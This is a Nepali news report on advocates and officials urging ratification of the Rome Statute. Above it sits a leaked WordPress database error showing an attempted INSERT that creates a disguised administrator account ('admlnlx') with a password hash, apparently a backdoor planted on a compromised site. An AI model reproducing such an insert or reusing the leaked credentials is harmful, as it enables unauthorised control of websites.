WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNib4qXd6sGF8Apm8BlkRyGjB3OXtF0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:42:29', '', 'admlnlx', 'admlnlx')
ललितपुर, पुस ५ –
मानवाधिकारका क्षेत्रमा काम गर्नेहरुले राजनीतिक दलहरुमा रोम विधान अनुमोदन गर्दा आफूहरु फस्छौँ कि भन्ने डर रहेको बताएका छन् ।
अनौपचारिक क्षेत्र सेवा केन्द्र ९इन्सेक०ले सोमबार यहाँ आयोजना गरेको कार्यक्रममा संविधानविद्, अधिवक्ता, अधिकारकर्मीलगायतले शक्तिमा भएकाहरुले नचाहेकै कारण विधान अनुमोदन हुन नसकेको ठोकुवा गरे ।
वरिष्ठ अधिवक्ता तथा सांसद राधेश्याम अधिकारीले दलहरुले हिंसामा विश्वास गर्दा विधान अनुमोदन गर्न डराएको आरोप लगाउनुभयो । उहाँले भन्नुभयो – “दलहरुले हिंसामा विश्वास गर्दा नै आफू फसिन्छ भनेर यसलाई अनुमोदन गर्न डराइरहेका छन् ।” जुनसुकै अन्तर्राष्ट्रिय कानुन अनुमोदनसँगै कार्यान्वयन पनि आवश्यक भएकामा उहाँको जोड छ ।
महान्याधिवक्ता रमनकुमार श्रेष्ठले आन्तरिक फौजदारी न्यायलाई बलियो बनाउनका लागि रोम विधानको अनुमोदन गर्नुपर्नेमा जोड दिनुभयो । साक्षी संरक्षण आवश्यक भएकामा उहाँको जोड छ । उहाँले भन्नुभयो – “विभिन्न देशमा हेर्दा यो महँगो देखिए पनि आवश्यक छ ।”
नेपाल कानुन आयोगका अध्यक्ष माधवप्रसाद पौडेलले आन्तरिक न्याय कमजोर हुँदा रोम विधानको बढी आवश्यकता पर्ने बताउनुभयो । नेपाल मानवअधिकार प्रत्याभूत गर्नेमा अघि रहेको उहाँको जिकिर छ । उहाँले भन्नुभयो – “दक्षिण एसियाका अन्य मुलुकभन्दा हामी अघि छौँ ।”
संविधानविद् डा सूर्य ढुङ्गेलले विधान अनुमोदनका लागि स्थानीयदेखि राजनीतिक तहसम्म सचेतना आवश्यक भएको बताउनुभयो । जवाफदेहिता निगरानी समूहका अध्यक्ष चरण प्रसार्इं र इन्सेकका अध्यक्ष सुबोधराज प्याकु¥यालले कानुन बलियो हुँदा आफूलाई दपेट्छ भन्ने त्रास दलका नेतामा भएको विचार व्यक्त गर्नुभयो । – रासस